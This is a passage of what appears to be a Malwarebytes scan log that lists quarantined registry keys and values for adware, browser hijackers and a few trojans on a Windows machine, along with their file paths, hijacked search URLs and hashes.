    PUP.Optional.DesktopFind, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\DESKTOP_E, Quarantined, [7b24aec5f5a56acc684eedf161a302fe],
    PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, Quarantined, [bce386ed702ae452e99b94621ae9966a],
    PUP.Optional.ProntSpooler, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\ProntSpooler, Quarantined, [a6f97cf7f5a53ef8db8a2ccc00032bd5],
    PUP.Optional.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FASTCOMPRESS, Quarantined, [148b83f0841636004a59d5e4c53fc739],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SPPD, Quarantined, [67387300b7e3a2945eb18d516a99669a],
    PUP.Optional.InstallCore, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\csastats, Quarantined, [7e214b289cfecd6925692dcd9370e818],
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Tutorials, Quarantined, [b5eae2918e0c1c1a6256e9e1af55a15f],
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\TutoTag, Quarantined, [1986353e2e6ca393d49b11a812f1be42],
    PUP.Optional.Wizzlabs, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Wizzlabs, Quarantined, [108f30439208fc3a854da65643c0f010],
    PUP.Optional.AppTrailers, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\APPDATALOW\SOFTWARE\AppTrailers, Quarantined, [edb2ec878911da5c301ef1faa95b02fe],
    PUP.Optional.Linkury, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{IELNKSRCH}, Quarantined, [148b7bf87426cf67160723d115ee09f7],
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [57486211e2b820163358a3f957ac7f81],
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}, Quarantined, [cad5ea89a7f37bbb58410cdb28db9b65],
    PUP.Optional.ProductSetup, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\PRODUCTSETUP, Quarantined, [fca3fb78c5d50a2c339502aec83bf60a],
    PUP.Optional.SystemHealer, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\SYSTEM HEALER, Quarantined, [acf39cd7633746f0961837c67b88817f],

    Registry Values: 68
    DDoSTool.Agent, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Pritc, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Quarantined, [e0bf9ed58e0c02343892308c0afac43c]
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\Icatti|installer_name, vbates_csmdcaex-00-gr_.exe, Quarantined, [712ecda69505da5c6641e7129e65a35d]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[fea1373ccad073c3c2ea2c9026de7c84]D1%26b[fea1373ccad073c3c2ea2c9026de7c84]DIE%26cc[fea1373ccad073c3c2ea2c9026de7c84]Dca%26pa[fea1373ccad073c3c2ea2c9026de7c84]DWincy%26cd[fea1373ccad073c3c2ea2c9026de7c84]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[fea1373ccad073c3c2ea2c9026de7c84]D344908437%26a[fea1373ccad073c3c2ea2c9026de7c84]Dwbf_dnldwz_16_37%26os_ver[fea1373ccad073c3c2ea2c9026de7c84]D6.1%26os[fea1373ccad073c3c2ea2c9026de7c84]DWindowsQuarantinedB7QuarantinedBProfessional, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://ca.search.yahoo.com/yhs/sea...003&type=wbf_softdl4u_16_25&param1=1&param2=f[9b043e35c6d42016d59505c41fe3a55b]D4%26b[9b043e35c6d42016d59505c41fe3a55b]DIE%26cc[9b043e35c6d42016d59505c41fe3a55b]Dca%26pa[9b043e35c6d42016d59505c41fe3a55b]DWincy%26cd[9b043e35c6d42016d59505c41fe3a55b]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[9b043e35c6d42016d59505c41fe3a55b]D1235740085%26a[9b043e35c6d42016d59505c41fe3a55b]Dwbf_softdl4u_16_25%26os_ver[9b043e35c6d42016d59505c41fe3a55b]D6.1%26os[9b043e35c6d42016d59505c41fe3a55b]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2f23ab71-4ac6-41f2-a955-ea576e553146}|URL, https://ca.search.yahoo.com/yhs/sea...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[504feb88fd9dbe7844265871c141a55b]D4%26b[504feb88fd9dbe7844265871c141a55b]DIE%26cc[504feb88fd9dbe7844265871c141a55b]Dca%26pa[504feb88fd9dbe7844265871c141a55b]DWincy%26cd[504feb88fd9dbe7844265871c141a55b]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[504feb88fd9dbe7844265871c141a55b]D344908437%26a[504feb88fd9dbe7844265871c141a55b]Dwbf_dnldwz_16_37%26os_ver[504feb88fd9dbe7844265871c141a55b]D6.1%26os[504feb88fd9dbe7844265871c141a55b]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [118ecca7d8c2ca6c6ecb5d5c887b7789]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [623dc9aa82189c9a91a89c1dc043df21]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [d6c94330e0bafe38a0996f4ad0334ab6]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [6e31d59ee0bade5887b2bffa83806898]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_removal_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [faa576fd0f8b89ad89b08f2a897ab947]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_reporter_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [2c730e65faa0ca6c50e94d6c30d3639d]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [4a5597dc4a50b87e5bdfaa0f31d24db3]
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11B0901B-7817-4D91-9457-0870BE557C0A}|Path, \ttwifi, Delete-on-Reboot, [118e0a69c8d2ec4af7812ecf10f38977]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6}|Path, \SystemHealer Run Delay, Delete-on-Reboot, [2a7580f38317c76f50706e83f50e7f81]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{20CC1331-B6C8-4E07-87C2-17BBB66FF2E6}|Path, \SMW_P, Delete-on-Reboot, [f0afa3d0ff9b66d0ae0f1addcc37dd23]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{33AA5276-F186-4F36-B614-FACEF7D12B73}|Path, \System HealerStartUp, Delete-on-Reboot, [e5ba482beab0ee48358a40b13dc6a957]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4DFEE54D-5A75-4674-9599-2CF0C1235984}|Path, \SystemHealer Monitor, Delete-on-Reboot, [455ae291bddd65d1734d9c55956ead53]
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4F4D22B5-7496-4CF9-9984-12320C3EEE6C}|Path, \nerta, Delete-on-Reboot, [514e3a394753fe382dff2ac55fa57789]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5AECB8E6-6A1D-4416-A94E-63AB73367CB3}|Path, \System HealerPeriod, Delete-on-Reboot, [eeb1dc974c4e0333bd02826f9370c53b]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9CF158C5-EBBF-4534-947A-C011B643E9A5}|Path, \System Healer Task, Delete-on-Reboot, [029de98acfcb6bcbe6d99e5331d260a0]
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B4C9453B-5317-4006-9B25-BD4D32EE1256}|Path, \bvyvcvd, Delete-on-Reboot, [9f00e390356572c4c20a2ecb3cc77a86]
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBD0F564-06A8-4CFE-8FF2-6C151538BA74}|Path, \PC SpeedUp Service Deactivator, Delete-on-Reboot, [e7b8abc86b2feb4bee8001ee25de12ee]
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F3A5846C-8CA4-4CEF-8D20-35484B32105D}|Path, \Pritc, Delete-on-Reboot, [9c032e457b1f4ee8a0a8b318738f39c7]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe, Quarantined, [dac53b38b5e57bbbaf4c797d5aa91de3]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE|Install, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [aff0472cdbbf0c2aa45737bff60d2dd3]
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IDSCCOMVGX, "C:\Program Files (x86)\EasyHotspot\idsccom_VGX.exe", Quarantined, [b3ecfb78b7e3f541e524748536cdae52]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOM6YE, "C:\Program Files (x86)\mpck\wincom_6YE.exe", Quarantined, [e0bf42317c1eb482cc0ad7f46b97dd23]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOM1YV, "C:\Program Files (x86)\sunnyday\wincom_1YV.exe", Quarantined, [b5ea01723c5eba7c3f97606bf2108d73]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMCF4, "C:\Program Files (x86)\sunnyday\wincom_CF4.exe", Quarantined, [5847cfa4abef989e9a3c3497a55d60a0]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMH7U, "C:\Program Files (x86)\sunnyday\wincom_H7U.exe", Quarantined, [623dc9aacbcf1c1a1bbb874416ec7789]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMTAO, "C:\Program Files (x86)\sunnyday\wincom_TAO.exe", Quarantined, [fca3680b61398fa7e9edb91201017e82]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\SEARCHMODULE\INFO|Aff, g9izftpbl0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [7c237003ddbdf2440466427e38cb6d93]
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\WOW6432NODE\Icatti|installer_name, vbates_csmdcaex-00-gr_.exe, Quarantined, [f3acdf94a6f4ce68b0f7708908fbf50b]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[f9a66f047129191d604c7f3d51b3b14f]D1%26b[f9a66f047129191d604c7f3d51b3b14f]DIE%26cc[f9a66f047129191d604c7f3d51b3b14f]Dca%26pa[f9a66f047129191d604c7f3d51b3b14f]DWincy%26cd[f9a66f047129191d604c7f3d51b3b14f]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[f9a66f047129191d604c7f3d51b3b14f]D344908437%26a[f9a66f047129191d604c7f3d51b3b14f]Dwbf_dnldwz_16_37%26os_ver[f9a66f047129191d604c7f3d51b3b14f]D6.1%26os[f9a66f047129191d604c7f3d51b3b14f]DWindowsQuarantinedB7QuarantinedBProfessional, %4, %5
    PUP.Optional.SpeedChecker, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|SpeedCheckerService.exe, 11000, Quarantined, [d2cda1d26a304de9e48db52ff21154ac]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DisplayName, Search the web, Quarantined, [dec12e453c5e80b6c8565d9730d348b8]
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [613e175cbfdbe74f06bb7f77c83bde22]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://ca.search.yahoo.com/yhs/sea...003&type=wbf_softdl4u_16_25&param1=1&param2=f[653a40332773bf779cce5c6dec16bf41]D4%26b[653a40332773bf779cce5c6dec16bf41]DIE%26cc[653a40332773bf779cce5c6dec16bf41]Dca%26pa[653a40332773bf779cce5c6dec16bf41]DWincy%26cd[653a40332773bf779cce5c6dec16bf41]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[653a40332773bf779cce5c6dec16bf41]D1235740085%26a[653a40332773bf779cce5c6dec16bf41]Dwbf_softdl4u_16_25%26os_ver[653a40332773bf779cce5c6dec16bf41]D6.1%26os[653a40332773bf779cce5c6dec16bf41]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2f23ab71-4ac6-41f2-a955-ea576e553146}|URL, https://ca.search.yahoo.com/yhs/sea...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[247b78fbbae07fb7cb9ffbced9291ee2]D4%26b[247b78fbbae07fb7cb9ffbced9291ee2]DIE%26cc[247b78fbbae07fb7cb9ffbced9291ee2]Dca%26pa[247b78fbbae07fb7cb9ffbced9291ee2]DWincy%26cd[247b78fbbae07fb7cb9ffbced9291ee2]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[247b78fbbae07fb7cb9ffbced9291ee2]D344908437%26a[247b78fbbae07fb7cb9ffbced9291ee2]Dwbf_dnldwz_16_37%26os_ver[247b78fbbae07fb7cb9ffbced9291ee2]D6.1%26os[247b78fbbae07fb7cb9ffbced9291ee2]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [fea192e15e3c9b9ba6c0b7155ea446ba]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe, Quarantined, [455a4e256e2c64d2cd2ee90ddc271ee2]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE|Install, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [cbd4f1824654f640cc2fa84ee41f38c8]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|DiskPower, "C:\Program Files (x86)\DPower\DiskPower.exe", Quarantined, [158aed86b1e9f73fad277850b64eeb15]
    Adware.EoRezo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|sun21, "C:\Program Files (x86)\SunnyDay21\SunnyDay.exe", Quarantined, [9d02155e2773a78f8f742ac900033ec2]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCH MODULE|Publisher, Goobzo, Quarantined, [732cfd76f4a6df57629ae1151ae95ca4]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCHPROTECT|Publisher, Client Connect LTD, Quarantined, [b6e90271ff9bdc5a7c8f5886c63db64a]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}|Publisher, Linkury, Quarantined, [b9e6086b7c1e88ae127ab2f6d82be21e]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}|Publisher, Linkury, Quarantined, [4857bcb76b2fae88d7b56d3bde2505fb]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\SEARCHMODULE\SMUPD|Scf, ÚÖ{ºl“/ßìeµÌ‡º 8FÔEð¨i¸ˆ‰^GÜÉ
    “§3ùPÀ‘SÛV¾R$Ö´qC8ïárªö@•?ìŸÝÕ˜e_,Ç ‡ï¶¼" ‘Sb‡,IPŸ°…<yú§;kb ¸‘leÄ Ì Š2…ƒC,¦v™®F¼•e¸øþ/îšx-‡m»ÁéZ%
    4 Á<7*CÇ!7P ‰äk}Š1`#¦\} ^£4@ h€H×ØÕö™rà–Î Ç?]¤¬Í4¤l+, ) XbVÔ³]D Þ $-"„Þê¤ @
    XI¾Ë ãOûH /¸3ö˜ùŠÂ3ƒ KÒ° ’׸µŒ} ô šG Ó[9ëuj‰î 0ýU «Ìj ÜÓ>0ۏ†œúûòÇúè ôPH, Quarantined, [bfe0da994d4d7cba4ce34f55ce35857b]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SEARCHPROTECT|InstallDir, C:\PROGRA~2\SearchProtect, Quarantined, [514e561d5c3e1e1827e516c8e51e23dd]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM|TS, 1, Quarantined, [1788c6adc3d7082e29e4f8e64db6c33d]
    PUP.Optional.DesktopFind, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\DeskTop_E|ImagePath, C:\ProgramData\desktopfindkey\desktop189.exe, Quarantined, [7b24aec5f5a56acc684eedf161a302fe]
    PUP.Optional.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FASTCOMPRESS|ImagePath, C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe, Quarantined, [148b83f0841636004a59d5e4c53fc739]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SPPD|ImagePath, \??\C:\WINDOWS\system32\drivers\SPPD.sys, Quarantined, [67387300b7e3a2945eb18d516a99669a]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\ENVIRONMENT|SNP, http://feed.snapdo.com?publisher=AP...016&barcodeid=50027003&channelid=3&av=windows, Quarantined, [039cec8717832214d812ec08aa599a66]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\ENVIRONMENT|SNF, C:\ProgramData\Doubleings\snp.sc, Quarantined, [0897155e405ad75f8762d2229b68e41c]
    PUP.Optional.IEAudioAds, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\INSTALLPATH\STATUS|NuvisionDataRemarketer, N, Quarantined, [e0bfe98a6c2e81b5738205a05ca7c937]
    PUP.Optional.Linkury, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DisplayName, Search the web, Quarantined, [148b7bf87426cf67160723d115ee09f7]
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://www.bing.com/search?pc=COSP&...form=CONBDF&conlogo=CT3334491&q={searchTerms}, Quarantined, [57486211e2b820163358a3f957ac7f81]
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURL, http://www.bing.com/search?pc=COSP&...form=CONBDF&conlogo=CT3334491&q={searchTerms}, Quarantined, [950aa4cfebafaf87513ad7c557ace719]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|OSDFileURL, http://www-searching.com/opensearch.ashx?s=G9Izftpbl0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [cad5ea89a7f37bbb58410cdb28db9b65]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|FaviconURL, http://www-searching.com/favicon.ico, Quarantined, [7926beb5752533036039a4431ce7c13f]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|URL, http://www-searching.com/s.ashx?prd...0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [f3aca9cac8d2cb6b9bfee2057f84e11f]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [3867c0b3bcde2f07d3eca15512f18e72]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [4b54d59ed1c95ed8dbe5589e9271ad53]
